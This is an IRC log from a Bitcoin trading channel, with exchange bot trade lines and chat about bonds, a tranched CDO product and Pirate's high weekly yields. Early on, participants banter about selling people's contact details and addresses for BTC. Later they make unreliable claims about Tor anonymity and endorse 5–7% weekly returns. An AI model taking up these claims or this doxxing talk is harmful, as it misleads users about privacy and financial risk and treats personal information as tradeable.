[S.MPOE] 12200 @ 0.00039267 = 4.7906 BTC [+] Aug 14 23:41:01 lol Aug 14 23:43:34 [MPEX] [S.MPOE] 10341 @ 0.00038456 = 3.9767 BTC [-] Aug 14 23:44:56 I have been both asked and offered to pay for JRO's full contact information Aug 14 23:45:12 really? Aug 14 23:45:18 i.e. people looking to sell and people looking to buy Aug 14 23:45:32 ill sell for the right price:) Aug 14 23:45:41 I just said I'm not involved with the situation. CPA will do that kind of work but only on behalf of a client, when we have a judgement in hand Aug 14 23:46:19 He better really be sick Aug 14 23:46:23 That's all I'm saying Aug 14 23:46:47 Once that was out, that he was claiming to be sick, all I can say is, it better be the truth.. from the rumblings I have heard lol Aug 14 23:48:47 :) Aug 14 23:49:02 i know a guy who started pulling up shit on him 3 months ago Aug 14 23:49:07 candad iceland usa lol Aug 14 23:49:14 tracking bis movements, Aug 14 23:49:19 we sorta saw this coming:) Aug 14 23:49:26 Yeah that's one of the reasons I stay anonymous Aug 14 23:49:43 you mean semi :) Aug 14 23:49:52 That and the fact I was planning on running an insurance company for quite some time. I'm the one that tracks people down, not the other way around Aug 14 23:50:03 for the right price ill post your current address to, haha Aug 14 23:50:09 Don't want any backlash you know what I mean Aug 14 23:50:18 Go ahead and post it now Aug 14 23:50:23 [MPEX] [O.BTCUSD.P170T] 1 @ 0.54607755 BTC [-] Aug 14 23:50:28 Consider it a game, if you win, you will win 1 btc Aug 14 23:50:37 and lose a potential sale? lol Aug 14 23:51:13 but really unless you realy really know what you are doing it only takes about 2 or 3 hours to find someone with an ien internet connection, even on tor Aug 14 23:51:25 that is why iv never been anon, Aug 14 23:51:27 Oh even on tor? Aug 14 23:51:47 tor only hids what you send,not who you are Aug 14 23:52:01 hides* Aug 14 23:52:10 or where you are... Aug 14 23:52:25 If you think you can sell my info for more than 1btc then PM it to me Aug 14 23:52:40 i bid 2 btc ;) Aug 14 23:52:52 that's 3 in total you can make right now Aug 14 23:53:19 4 btc if you include a picture of usagi with a shoe on his or her head Aug 14 23:53:20 :P Aug 14 23:53:21 lol Aug 14 23:53:33 id have to paymore than that to get it Aug 14 23:53:46 its not cheep but it can be done Aug 14 23:54:07 for someone trying to be semi anon ya Aug 14 23:54:18 There are only 3 places you could get my ID from Aug 14 23:54:30 but if i wanted to actually be anon, under an unused alias Aug 14 23:54:38 using current technology u couldnt find me for any price Aug 14 23:54:39 i did not say ID, i said address Aug 14 23:54:43 :P Aug 14 23:54:51 You can't get my address Aug 14 23:54:57 You could find out my city maybe Aug 14 23:54:57 okay Aug 14 23:55:14 i could get very very close. Aug 14 23:55:17 Then you would need a photo, and that means you have to pay off nefario. Aug 14 23:55:35 My name is not enough, my photo does not even appear in my highschool yearbooks. Aug 14 23:55:39 There's a blank. Aug 14 23:55:39 i know you are a white guy in tiawan, i also know you are english Aug 14 23:55:45 Hahahaha Aug 14 23:55:46 if i wanted to i could figure it out Aug 14 23:55:52 A white guy in Taiwan Aug 14 23:55:57 Good luck Goat :) Aug 14 23:56:23 a white guy called serena Aug 14 23:56:43 I know a white guy in Taiwan. It's not Usagi, so it must be the other one. Aug 14 23:56:58 he might be a girl, im not sure to be honest Aug 14 23:57:12 i dont think he's sure Aug 14 23:57:14 :P Aug 14 23:57:19 :) Aug 14 23:57:25 btc price keeps crawling up Aug 14 23:57:36 !ticker Aug 14 23:57:36 Provide ticker. Aug 14 23:57:53 ;;ticker Aug 14 23:57:53 Best bid: 12.16201, Best ask: 12.19762, Bid-ask spread: 0.03561, Last trade: 12.19878, 24 hour volume: 53902, 24 hour low: 11.70999, 24 hour high: 12.19879 Aug 14 23:58:00 right :) Aug 14 23:58:23 [MPEX] [S.MPOE] 50900 @ 0.00038106 = 19.396 BTC [-] Aug 14 23:58:45 Any exchanges in Thailand? Aug 14 23:59:25 www.bahtcoin.com Aug 14 23:59:46 Bahtman Aug 15 00:00:10 < kakobrekla> this is wrong isnt it <<< i'm pretty sure it's not Aug 15 00:00:22 it was. Aug 15 00:00:35 capital was off by factor of 10 Aug 15 00:00:52 Nice with the top up service Aug 15 00:02:01 yeah, sadly i now have a data plan and pay monthly Aug 15 00:02:07 i used to use it all the time was epic Aug 15 00:02:24 [MPEX] [S.MPOE] 2300 @ 0.00038106 = 0.8764 BTC [-] Aug 15 00:02:25 [MPEX] [S.MPOE] 48731 @ 0.00037668 = 18.356 BTC [-] Aug 15 00:02:26 [MPEX] [S.MPOE] 57900 @ 0.00037356 = 21.6291 BTC [-] Aug 15 00:02:27 [MPEX] [S.MPOE] 65213 @ 0.00036471 = 23.7838 BTC [-] Aug 15 00:02:28 [MPEX] [S.MPOE] 5856 @ 0.00036172 = 2.1182 BTC [-] Aug 15 00:03:14 kakobrekla: what was wrong about it (i guess i was only looking at the % Aug 15 00:03:16 ) Aug 15 00:03:24 oh Aug 15 00:03:29 i should read more often Aug 15 00:06:54 [MPEX] [F.GIGA.ETF] 889 @ 0.00111789 = 0.9938 BTC [+] Aug 15 00:06:56 [MPEX] [F.GIGA.ETF] 6701 @ 0.00111949 = 7.5017 BTC [+] Aug 15 00:06:57 [MPEX] [F.GIGA.ETF] 10010 @ 0.00112057 = 11.2169 BTC [+] Aug 15 00:07:26 how much you;'re out on zip/rebate usagi ? Aug 15 00:07:38 hes gone Aug 15 00:08:21 o Aug 15 00:10:53 he is back Aug 15 00:11:03 or s/he is back :) Aug 15 00:11:11 Oh bloody hell. Looks like I've been Shanghai'd Aug 15 00:11:28 how much you;'re out on zip/rebate usagi ? Aug 15 00:11:38 thats what you get for being drunk in the north eastern part of the usa Aug 15 00:11:46 $1700? Aug 15 00:11:50 plenty huh. Aug 15 00:12:16 why did you trust him and mathew in the firstplace? Aug 15 00:12:25 as in, guy secretly had borrowed 10's of k's. Aug 15 00:12:46 yeah once i found out kludge was working with him i sold off bdk hard hard hard, i had 80% of it at one point Aug 15 00:13:08 umm what's their total float ? Aug 15 00:13:15 something like a coupla k's ? Aug 15 00:14:18 he was doing like 5 differnt projects at once Aug 15 00:14:28 i meant the bank thingee. Aug 15 00:14:30 i wonder how much matthew got out of this Aug 15 00:14:38 other than the trip to iceland Aug 15 00:14:46 but seriously guyse, apart from patrickharnett's, what other serious banks are out there ? Aug 15 00:14:59 Given how much customer money I have under management, my fund will eat the loss on behalf of my customers Aug 15 00:15:03 They won't notice the loss. Aug 15 00:15:18 .C will keep getting 8%+ a week until pirate crashes and that will be that Aug 15 00:15:48 pirate is saving a whole lot of peoples asses right now:) Aug 15 00:15:58 [MPEX] [S.MPOE] 35553 @ 0.00038108 = 13.5485 BTC [+] Aug 15 00:18:16 so i take it no banks. Aug 15 00:18:39 Sacre bleu! Aug 15 00:18:51 Well Nyancat Financial is a bank, Mircea Aug 15 00:19:06 who runs it ? where's description etc ? Aug 15 00:19:09 usagi: I thought you went to bed? Aug 15 00:19:11 I run it. Aug 15 00:19:16 I can't sleep Diablo Aug 15 00:19:21 too exciting? Aug 15 00:19:29 Diablo-D3 is busy taking over mining world i gather :D Aug 15 00:19:33 I had to fly to Shanghai really quick. Aug 15 00:19:45 mircea_popescu: yup Aug 15 00:19:46 Mircea; Website will be up and running soon Aug 15 00:21:22 usagi: btw, I think I'm going to revise the trade deal tommorow Aug 15 00:21:25 or maybe today Aug 15 00:22:52 mkay so i'm about to offer a proper CD, three tiered. Aug 15 00:23:32 require 15 mhash per trade Aug 15 00:23:57 if anyone knows of bond issuers that are neither pirate nor mining exposed, and owned by really well known supertrustworthy people i wanna hear. Aug 15 00:23:58 A three tiered CD? Aug 15 00:24:01 yes. Aug 15 00:24:54 mircea: http://tensionhead26.deviantart.com/art/Black-Sabbath-devil-34718908 Aug 15 00:25:56 usagi: see pm. Aug 15 00:26:21 yes, i am devil. Aug 15 00:26:32 two of my bonds are not pirate or mining exposed Aug 15 00:26:38 there are others Aug 15 00:26:48 TEEK.A is fully guaranteed Aug 15 00:26:57 lettuce look into this teek. Aug 15 00:27:52 [MPEX] [S.MPOE] 4200 @ 0.00036438 = 1.5304 BTC [-] Aug 15 00:28:41 teek : 10k issued 586 total volume since day 1 ? Aug 15 00:28:50 usagi: see pm now. Aug 15 00:30:02 mircea_popescu: something like that.. seems the interest is too low, everyone wants pirate rates Aug 15 00:30:03 :P Aug 15 00:30:21 i hear you. Aug 15 00:30:26 It's the same with nyan, everyone buys .c, NO ONE buys .a or even .b Aug 15 00:30:43 And if I close sales... the price shoots up, and no one buys a or b Aug 15 00:30:48 thats stupid Aug 15 00:31:05 the ideea here is that im tranching 500 btc of mpoe bonds (yielding ~5% per month) + 500 btc of harnett's (yielding 1% per week). Aug 15 00:31:29 i can't paste that with stuff doing 0.3% per week, even tho i understand that 15% pa is significant. Aug 15 00:32:36 tranching? Aug 15 00:32:51 mircea_popescu: If you offer 15% outside bitcoin they'd call it a HYIP :P Aug 15 00:32:51 you know how cd's work right ? Aug 15 00:32:53 or a ponzi Aug 15 00:32:57 in Bitcoin its too low :D Aug 15 00:33:01 Luceo and for a good reason. Aug 15 00:33:13 i fully understand this, and it's ap roblem, but it can't be resolved overnight. Aug 15 00:33:23 there must be a popped ponzi first for people to learn. Aug 15 00:36:51 People still wont learn :/ Aug 15 00:37:09 Lol Aug 15 00:37:15 I can't access google docs in China Aug 15 00:37:17 wtf Aug 15 00:37:24 Use a VPN :D Aug 15 00:38:14 [GLBSE] [FOO.PPPPT] 15 @ 1.02 = 15.3 BTC [+] Aug 15 00:42:09 [GLBSE] [BITCOINMINV] 10 @ 0.125 = 1.25 BTC [+] Aug 15 00:42:49 [GLBSE] [TYGRR.BOND-P] 5 @ 1 = 5 BTC [+] Aug 15 00:43:08 mircea_popescu: i just read the wiki on tranching but am a little fuzzy.. can you explain how it works here? Aug 15 00:43:21 one sec i'll fish up a link Aug 15 00:45:47 teek https://bitcointalk.org/index.php?;topic=76515.0 Aug 15 00:46:13 [GLBSE] [DMC] 9 @ 0.04999999 = 0.45 BTC [+] Aug 15 00:46:55 [GLBSE] [GIGAMINING] 2 @ 1.12 = 2.24 BTC [-] Aug 15 00:47:04 [GLBSE] [PUREMINING] 2 @ 0.14040001 = 0.2808 BTC [-] Aug 15 00:47:05 [GLBSE] [PUREMINING] 71 @ 0.1404 = 9.9684 BTC [-] Aug 15 00:47:10 bidwall is up on nyan.a if anyone wants out Aug 15 00:47:16 [GLBSE] [ASICMINER] 10 @ 0.13 = 1.3 BTC [+] Aug 15 00:47:55 ASICMINER going to .5 :p Aug 15 00:49:01 [MPEX] [S.MPOE] 14100 @ 0.00037287 = 5.2575 BTC [+] Aug 15 00:49:18 im afraid this is going to be a pump and dump Aug 15 00:49:33 I will certainly sell at .5 Aug 15 00:49:36 Maybe a little at .3 Aug 15 00:49:49 1-3-5-8-13 Aug 15 00:49:59 price points. Aug 15 00:50:21 [GLBSE] [FOO.PPPPT] 5 @ 1.0001 = 5.0005 BTC [-] Aug 15 00:50:39 The reason why is because each price point represents a new wave of investors after the old wave has covered their risk Aug 15 00:50:47 evening people :) Aug 15 00:51:07 1-3-5-8-13 < what's this ? Aug 15 00:51:11 The next wave will take it to .3 when it sinks into the market that ASICMINER is real Aug 15 00:51:11 heya DeaDTerra Aug 15 00:51:18 [GLBSE] [FOO.PPPPT] 7 @ 1.0001 = 7.0007 BTC [-] Aug 15 00:51:20 [GLBSE] [FOO.PPPPT] 23 @ 1 = 23 BTC [-] Aug 15 00:51:24 [GLBSE] [OBSI.HRPT] 93 @ 0.1047 = 9.7371 BTC [+] Aug 15 00:51:25 [GLBSE] [OBSI.HRPT] 7 @ 0.1048 = 0.7336 BTC [+] Aug 15 00:51:32 Then greedy people will rush in and the original investors will sell at .5 Aug 15 00:51:54 Then it will go back to .3 then up to .8 again, but that might not happen for over a year Aug 15 00:52:01 Just technical analysis price points Aug 15 00:52:09 wave analysis etc Aug 15 00:52:15 Selling ASICMINER shares :) Pm me if you are interested! Aug 15 00:52:18 [GLBSE] [FOO.PPPPT] 50 @ 1 = 50 BTC [-] Aug 15 00:53:10 [GLBSE] [TYGRR.BOND-P] 3 @ 0.999 = 2.997 BTC [-] Aug 15 00:54:06 mircea_popescu: i think i get it, thanks for the info.. so out of curiosity why would mixing something at .3% and something at 1% not be desirable? Aug 15 00:54:32 [GLBSE] [TYGRR.BOND-P] 17 @ 0.987 = 16.779 BTC [-] Aug 15 00:54:33 [GLBSE] [TYGRR.BOND-P] 3 @ 0.986 = 2.958 BTC [-] Aug 15 00:54:34 [GLBSE] [TYGRR.BOND-P] 76 @ 0.98501 = 74.8608 BTC [-] Aug 15 00:54:35 [GLBSE] [TYGRR.BOND-P] 1 @ 0.985 BTC [-] Aug 15 00:54:45 teek you either mix things of the same risk and varying rewards to arbitrage reward Aug 15 00:54:54 or things of the same reward and varying risks to arbitrage risk Aug 15 00:55:06 my ideea is that nobody currently has an inkling as to risk measurements in btc world Aug 15 00:55:10 so that'd be what i want to offer. Aug 15 00:56:49 [MPEX] [S.MPOE] 46372 @ 0.00037287 = 17.2907 BTC [+] Aug 15 00:59:28 [GLBSE] [DMC] 22 @ 0.04999999 = 1.1 BTC [+] Aug 15 00:59:43 how do I do the purple thing? :( Aug 15 01:01:00 mircea_popescu, still a little confused.. so in this case harnett would be the senior tranche thus offering the least reward, then mpoe, then you need some others in there or? Aug 15 01:01:13 no Aug 15 01:01:21 if you wait a few minutes i'll show you the actual contract. Aug 15 01:01:30 putting the finishing touches on it nao. Aug 15 01:01:41 sure, now i just want to understand it :) Aug 15 01:02:45 $12.34 Aug 15 01:02:50 ;;ticker Aug 15 01:02:51 Best bid: 12.32479, Best ask: 12.3248, Bid-ask spread: 0.00001, Last trade: 12.32479, 24 hour volume: 47868, 24 hour low: 11.7555, 24 hour high: 12.34 Aug 15 01:02:58 holy craapola Aug 15 01:03:22 cmon btc! daddy needs a new set of gpus! Aug 15 01:03:27 ;) Aug 15 01:04:00 lol Aug 15 01:04:12 want me to send you a second box full of 21 gpus? :) Aug 15 01:04:16 What has pirate changed his rates to? Aug 15 01:04:22 and is there a official announcement yet? Aug 15 01:04:51 lol Aug 15 01:05:11 naw i think im good for now :P Aug 15 01:05:58 DeaDTerra, 5% top tier Aug 15 01:06:27 hm that sucks :( Aug 15 01:06:35 I just got started with all of this :P Aug 15 01:07:14 [MPEX] [F.GIGA.ETF] 790 @ 0.00112057 = 0.8853 BTC [+] Aug 15 01:07:15 [MPEX] [F.GIGA.ETF] 9410 @ 0.00112095 = 10.5481 BTC [+] Aug 15 01:08:02 [GLBSE] [DMC] 2 @ 0.04999999 = 0.1 BTC [+] Aug 15 01:08:21 [GLBSE] [DMC] 23 @ 0.04999999 = 1.15 BTC [+] Aug 15 01:08:23 [GLBSE] [DMC] 27 @ 0.05 = 1.35 BTC [+] Aug 15 01:09:38 5% a week is still freaking awesome Aug 15 01:10:14 It is but not as good at 7% xD Aug 15 01:10:16 yeah yeah mr top tier Aug 15 01:10:17 :P Aug 15 01:10:18 [GLBSE] [DMC] 4 @ 0.05 = 0.2 BTC [+] Aug 15 01:10:18 Greedy maybe Aug 15 01:10:54 [MPEX] [S.MPOE] 106 @ 0.00038108 = 0.0404 BTC [+] Aug 15 01:10:56 [MPEX] [S.MPOE] 23390 @ 0.00038129 = 8.9184 BTC [+] Aug 15 01:12:11 its not hard to get 4.8 or 4.9% with a bit of trust :) Aug 15 01:12:26 actually, my lower tier will do 9%. Aug 15 01:12:32 just give me a second here to finish this :D Aug 15 01:12:34 [GLBSE] [JTME] 1 @ 0.9 BTC [-] Aug 15 01:12:53 I hope your not copying Nyancat Financial :P) Aug 15 01:13:06 It's weird. Every time I list a new security, 2 or 3 pop up just like it Aug 15 01:13:16 haha i think i have dibs on cdo's usagi Aug 15 01:13:17 hahahah xD Aug 15 01:13:23 see the link i sent to teek above, it's from april lol Aug 15 01:13:29 Mmm Aug 15 01:13:43 I get 5% :) and I got 7% before, though I was not heavily invested into Pirate, but I am convinced now. Aug 15 01:14:00 [GLBSE] [TYGRR.BOND-PI] 1 @ 1.539 BTC [-] Aug 15 01:15:36 [GLBSE] [TYGRR.BOND-P] 14 @ 1 = 14 BTC [+] Aug 15 01:15:50 [GLBSE] [DMC] 19 @ 0.05 = 0.95 BTC [+] Aug 15 01:20:58 [GLBSE] [FOO.PPPPT] 2 @ 1.048 = 2.096 BTC [+] Aug 15 01:22:16 JAH div payout missing... Hmm... Aug 15 01:23:02 [GLBSE] [BIB.PIRATE] 2 @ 0.98 = 1.96 BTC [-] Aug 15 01:23:14 [GLBSE] [BIB.PIRATE] 3 @ 0.98 = 2.94 BTC [-] Aug 15 01:23:46 [GLBSE] [PPT.DIV] 1 @ 0.575 BTC [-] Aug 15 01:24:11 [GLBSE] [YARR] 43 @ 1.51 = 64.93 BTC [+] Aug 15 01:25:13 Did pirate pay this weekends interest fully (7%) Aug 15 01:26:55 yes Aug 15 01:27:38 [GLBSE] [TYGRR.BOND-P] 9 @ 1 = 9 BTC [+] Aug 15 01:29:13 [GLBSE] [FOO.PPPPT] 1 @ 1.048 BTC [+] Aug 15 01:29:15 [GLBSE] [FOO.PPPPT] 6 @ 1.049 = 6.294 BTC [+] Aug 15 01:29:16 [GLBSE] [FOO.PPPPT] 10 @ 1.0499 = 10.499 BTC [+] Aug 15 01:29:17 [GLBSE] [FOO.PPPPT] 8 @ 1.05 = 8.4 BTC [+] Aug 15 01:29:18 [GLBSE] [FOO.PPPPT] 4 @ 1.0699 = 4.2796 BTC [+] Aug 15 01:29:19 [GLBSE] [FOO.PPPPT] 16 @ 1.07 = 17.12 BTC [+] Aug 15 01:29:21 okay good :) Aug 15 01:30:13 [GLBSE] [TYGRR.BOND-P] 1 @ 0.986 BTC [-] Aug 15 01:30:15 [GLBSE] [TYGRR.BOND-P] 12 @ 0.985 = 11.82 BTC [-] Aug 15 01:30:16 [GLBSE] [TYGRR.BOND-P] 8 @ 0.98135 = 7.8508 BTC [-] Aug 15 01:30:18 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9803 BTC [-] Aug 15 01:30:19 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9803 BTC [-] Aug 15 01:30:20 [GLBSE] [TYGRR.BOND-P] 16 @ 0.9802 = 15.6832 BTC [-] Aug 15 01:30:21 [GLBSE] [TYGRR.BOND-P] 15 @ 0.9801 = 14.7015 BTC [-] Aug 15 01:30:22 [GLBSE] [TYGRR.BOND-P] 49 @ 0.98 = 48.02 BTC [-] Aug 15 01:30:23 [GLBSE] [TYGRR.BOND-P] 1 @ 0.98 BTC [-] Aug 15 01:30:24 [GLBSE] [TYGRR.BOND-P] 29 @ 0.9702 = 28.1358 BTC [-] Aug 15 01:30:25 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9701 = 3.8804 BTC [-] Aug 15 01:30:26 [GLBSE] [TYGRR.BOND-P] 89 @ 0.97 = 86.33 BTC [-] Aug 15 01:30:27 [GLBSE] [TYGRR.BOND-P] 73 @ 0.97 = 70.81 BTC [-] Aug 15 01:31:26 [GLBSE] [TYGRR.BOND-P] 58 @ 0.99 = 57.42 BTC [+] Aug 15 01:31:39 [GLBSE] [YARR] 83 @ 1.452 = 120.516 BTC [-] Aug 15 01:34:08 shit I think GLBSE crashed xD Aug 15 01:34:19 I was going to get some cheak Pirate bonds :( Aug 15 01:34:24 nvm up again Aug 15 01:35:10 What makes you say you're now convinced? Aug 15 01:35:54 duffel bags full of cash of course Aug 15 01:36:18 :P Aug 15 01:36:36 Several different aspects, Pirate showing that he's the manipulator, showing screenshots of him manipulating the market as well as doing it live. Aug 15 01:36:45 lol Aug 15 01:36:48 Showing up in person, which matches a previous picture of him. Aug 15 01:36:54 talking to the people that meet him. Aug 15 01:37:00 the actions of the people that meet him Aug 15 01:37:09 [GLBSE] [FOO.PPPPT] 2 @ 1.082 = 2.164 BTC [+] Aug 15 01:38:15 [MPEX] [S.MPOE] 12799 @ 0.00038076 = 4.8733 BTC [-] Aug 15 01:38:17 [MPEX] [S.MPOE] 15140 @ 0.00037115 = 5.6192 BTC [-] Aug 15 01:38:18 [MPEX] [S.MPOE] 28061 @ 0.00036172 = 10.1502 BTC [-] Aug 15 01:38:23 Is he lowering rates because the price is so high now, it's harder to move it? Aug 15 01:38:37 [GLBSE] [BIB.PIRATE] 2 @ 0.98 = 1.96 BTC [-] Aug 15 01:40:17 The Bitcoin market become larger in volume hence harder to controll, he needs more capital to make the same amount hence the profit per BTC is less, hence he needs to reduce the interest rate. Aug 15 01:40:39 [MPEX] [F.GIGA.ETF] 2790 @ 0.00112095 = 3.1275 BTC [+] Aug 15 01:40:41 [MPEX] [F.GIGA.ETF] 9993 @ 0.00112262 = 11.2183 BTC [+] Aug 15 01:41:22 I guess that makes sense... If that's how he makes the money Aug 15 01:42:06 Of course you never know, and I am not saying it's not a risk. It's high risk high reward game. Aug 15 01:42:25 The matter is by no way proven, but it's leaning enough for me to invest a good % of my capital into pirate Aug 15 01:43:43 [GLBSE] [OBSI.HRPT] 8 @ 0.1046 = 0.8368 BTC [-] Aug 15 01:46:17 [GLBSE] [BITBOND] 2 @ 0.4011 = 0.8022 BTC [-] Aug 15 01:46:19 [GLBSE] [BITBOND] 7 @ 0.401 = 2.807 BTC [-] Aug 15 01:46:20 [GLBSE] [BITBOND] 1 @ 0.400001 BTC [-] Aug 15 01:46:20 [GLBSE] [BITBOND] 6 @ 0.4000001 = 2.4 BTC [-] Aug 15 01:46:22 [GLBSE] [BITBOND] 200 @ 0.4 = 80 BTC [-] Aug 15 01:46:23 [GLBSE] [BITBOND] 8 @ 0.39051 = 3.1241 BTC [-] Aug 15 01:46:24 [GLBSE] [BITBOND] 2 @ 0.3905 = 0.781 BTC [-] Aug 15 01:46:25 [GLBSE] [BITBOND] 50 @ 0.3905 = 19.525 BTC [-] Aug 15 01:46:26 [GLBSE] [BITBOND] 108 @ 0.3902 = 42.1416 BTC [-] Aug 15 01:46:30 [GLBSE] [TYGRR.BOND-B] 47 @ 0.1 = 4.7 BTC [-] Aug 15 01:48:10 !pl bitbond 0.6 Aug 15 01:48:10 Requesting data from GLBSE (might take a while). Aug 15 01:48:22 BITBOND [1@0.6BTC] paid: 0.16332995 BTC. Last price: 0.3902 BTC. Capital gain: -0.2098 BTC. Total: -0.04647005 BTC. (-7.7%) Aug 15 01:49:06 [GLBSE] [BITBOND] 8 @ 0.39 = 3.12 BTC [-] Aug 15 01:49:07 [GLBSE] [BITBOND] 8 @ 0.3851 = 3.0808 BTC [-] Aug 15 01:49:09 [GLBSE] [ASICMINER] 1 @ 0.22 BTC [+] Aug 15 01:51:58 [GLBSE] [ASICMINER] 9 @ 0.22 = 1.98 BTC [+] Aug 15 01:53:25 Looking to buy Pirate bonds/assets for anyone that want out, and I am looking to sell ASICMINER shares :) Aug 15 01:53:50 Paying par on bonds or? How much are you selling asic shares for? Aug 15 01:54:10 [GLBSE] [PPT.DIV] 3 @ 0.575 = 1.725 BTC [-] Aug 15 01:54:55 Paying par on bonds or? waht do you mean? Aug 15 01:55:04 ASIC it depends on volume but pm me for a price ;) Aug 15 01:55:56 [GLBSE] [JAH] 2 @ 0.159899 = 0.3198 BTC [+] Aug 15 01:56:05 The bonds are generally 1 btc each. Are you offering 1btc for such bonds or less? Aug 15 01:56:29 [GLBSE] [YARR] 2 @ 1.44100011 = 2.882 BTC [-] Aug 15 01:56:30 [GLBSE] [YARR] 3 @ 1.42000011 = 4.26 BTC [-] Aug 15 01:56:31 [GLBSE] [YARR] 31 @ 1.42 = 44.02 BTC [-] Aug 15 01:56:32 [GLBSE] [YARR] 4 @ 1.42 = 5.68 BTC [-] Aug 15 01:56:47 *** YARR: Dividend changed to 0.005/day until we get an announcement from pirate Aug 15 01:57:04 1 BTC each Aug 15 01:57:11 or maybe a bit less Aug 15 01:57:22 depending if the Interest rates are already paid out and what the market looks like Aug 15 01:59:04 [GLBSE] [M.ETF] 4 @ 0.15 = 0.6 BTC [+] Aug 15 01:59:14 [GLBSE] [OBSI.HRPT] 1 @ 0.104599 BTC [-] Aug 15 01:59:28 [GLBSE] [ASICMINER] 33 @ 0.12 = 3.96 BTC [-] Aug 15 01:59:30 [GLBSE] [ASICMINER] 10 @ 0.112 = 1.12 BTC [-] Aug 15 01:59:47 alrighty so. ANNOUNCEMENT : introducing MPCD.A, .B and .C Aug 15 01:59:49 http://polimedia.us/bitcoin/mpex.php Aug 15 01:59:54 go read the contract and have fun trading! Aug 15 01:59:58 taking any questions. Aug 15 02:01:39 Wow creative... I think I have heard about that before... something about a cat Aug 15 02:01:40 Lol Aug 15 02:01:47 a cat ? Aug 15 02:01:47 Lol DT I know, like I said Aug 15 02:02:14 Maybe a NyanCat? or maybe it wasn't a cat at all just Nyan. yea just Nyan Aug 15 02:02:27 https://bitcointalk.org/index.php?;topic=76515.0 << APRIL omg. Aug 15 02:02:39 and btw, pinging teek. Aug 15 02:03:32 No one is saying they invented the CDO Aug 15 02:03:43 Just seems strange 2 days after I explained NYAN to you, this comes out :p Aug 15 02:03:54 Kind of like TYGRR.BOND-PI and yarr but hey Aug 15 02:04:02 It's a big market, I'm not the only fast food restaurant Aug 15 02:04:05 mpoe bonds are fixed at 4.9? Aug 15 02:04:12 [MPEX] [B.MPCD.C] 5000 @ 0.001 = 5 BTC Aug 15 02:04:16 [MPEX] [O.BTCUSD.C100T] 1 @ 0.25910304 BTC [+] Aug 15 02:04:20 kakobrekla currently fixed at 5% kakobrekla Aug 15 02:04:42 dude srsly. this was announced ~4 months ago! Aug 15 02:05:03 lolwhat Aug 15 02:05:11 No one is saying they invented a CDO Aug 15 02:05:12 start a niche market with regular speed food restaurant , or hell even slow food Aug 15 02:05:13 as in can't go over 5% Aug 15 02:05:26 I'm just ribbing you mircea. But I doubt you will pay 15% like you said Aug 15 02:05:34 9% ? why not ? Aug 15 02:05:40 9%, right Aug 15 02:05:52 Because it's too imbalanced Aug 15 02:06:06 You're paying 2x the value of the highest known paying security Aug 15 02:06:12 What kind of guarantee are you offering? Aug 15 02:06:14 well that is the very point of a cdo. Aug 15 02:06:16 for the top trance? Aug 15 02:06:41 It's too much pressure. You will have to limit sales. Aug 15 02:06:50 the top pays 2. the bottom pays 9. Aug 15 02:06:52 Then the price will shoot up and investors will not realize 9% Aug 15 02:06:57 aww all the asicminer is gone Aug 15 02:06:59 sales are limited. did you read the contract ? Aug 15 02:07:05 No Aug 15 02:07:07 lol Aug 15 02:07:16 Well sales are limited, right Aug 15 02:07:20 I should probably do that too Aug 15 02:07:36 Henceforth NYAN.C is limited to 3,000 outstanding Aug 15 02:07:40 GET IT WHILE YOU CAN Aug 15 02:07:41 cdos are limited by their very nature. Aug 15 02:07:44 lol! Aug 15 02:07:46 hm imho clean mpoe bonds is better deal than A or B Aug 15 02:07:59 quick im logging in now to cancel the ask Aug 15 02:08:11 kakobrekla well possibly, depends on your risk profile et all. Aug 15 02:08:20 A has practically no risk i would guess. Aug 15 02:08:44 i dont see how A can have less risk than MPOE bond if its operated by you on the end Aug 15 02:09:41 [MPEX] [B.MPCD.B] 80000 @ 0.001 = 80 BTC Aug 15 02:09:58 well mpoe bond can either not kick in (if people offer lower interest) Aug 15 02:10:07 or lese it could get hosed if people buy options and get lucky. Aug 15 02:10:22 [MPEX] [S.MPOE] 16100 @ 0.00038129 = 6.1388 BTC [+] Aug 15 02:11:08 [GLBSE] [TYGRR.BOND-P] 12 @ 1 = 12 BTC [+] Aug 15 02:11:48 MPOE bonds loose if MPOE makes a loss. For A to lose, one and possibly more of MPOE bonds, Patrick and NYAN would need to makes losses. Aug 15 02:11:54 [GLBSE] [BIB.PIRATE] 56 @ 0.98 = 54.88 BTC [-] Aug 15 02:12:08 patrick starfish Aug 15 02:12:08 A is 400 out of a 1.1k pool. Aug 15 02:12:09 ? Aug 15 02:12:19 either mpoe or patrick would have to completely wipeout Aug 15 02:12:20 and then some Aug 15 02:12:26 yes BTCHero Aug 15 02:12:30 [MPEX] [S.MPOE] 22110 @ 0.00038129 = 8.4303 BTC [+] Aug 15 02:12:30 [MPEX] [S.MPOE] 22390 @ 0.000383 = 8.5754 BTC [+] Aug 15 02:12:43 tbh i don't think there exists more secure anything than .A atm. Aug 15 02:12:59 mircea_popescu, the %'s for a,b,c are these arbitrary #'s you decide or is there some math behind them? Aug 15 02:13:20 nyan.a is guaranteed by bitcoins held in an offline paper wallet. Aug 15 02:13:26 teek i just picked numbers. Aug 15 02:13:43 pretty much want to see what market says. Aug 15 02:14:28 [MPEX] [S.BVPS] 188 @ 0.003828 = 0.7197 BTC [-] Aug 15 02:15:02 i see Aug 15 02:15:39 usagi, this isn't really the same as nyan Aug 15 02:16:42 there are three, chain-default tiers for which the interest paid is declared by fiat out of a pool, and not related to the underlying value of the funds? Aug 15 02:17:20 Actually I think she mentioned there are 2 tiers Aug 15 02:17:44 who's she ? and whether there's 2 or 18 is not really too important. Aug 15 02:17:54 Well teek, didn't you actually invented the first CDO you know, teek.A and teek.B? Aug 15 02:18:22 [GLBSE] [TYGRR.BOND-P] 3 @ 1 = 3 BTC [+] Aug 15 02:18:35 [GLBSE] [ARS] 5 @ 0.009 = 0.045 BTC [-] Aug 15 02:18:41 i am honestly not sure, but teek.a and teek.b really have no relation other than name Aug 15 02:18:59 so if what mircea_popescu is doing is a cdo then no Aug 15 02:19:10 i think it's pretty much by the book a cdo. Aug 15 02:20:00 someone should make a cdo from all pirate insured offers Aug 15 02:20:22 that might be a great ideea actually. Aug 15 02:20:41 tranche it 10/20/30/40 in 4 tiers Aug 15 02:21:27 [GLBSE] [TYGRR.BOND-P] 2 @ 0.99 = 1.98 BTC [-] Aug 15 02:25:27 [GLBSE] [FPGAMINING] 1 @ 0.94 BTC [-] Aug 15 02:25:29 [GLBSE] [JTME] 1 @ 0.99899 BTC [+] Aug 15 02:26:56 the only difference, teek, might be that in 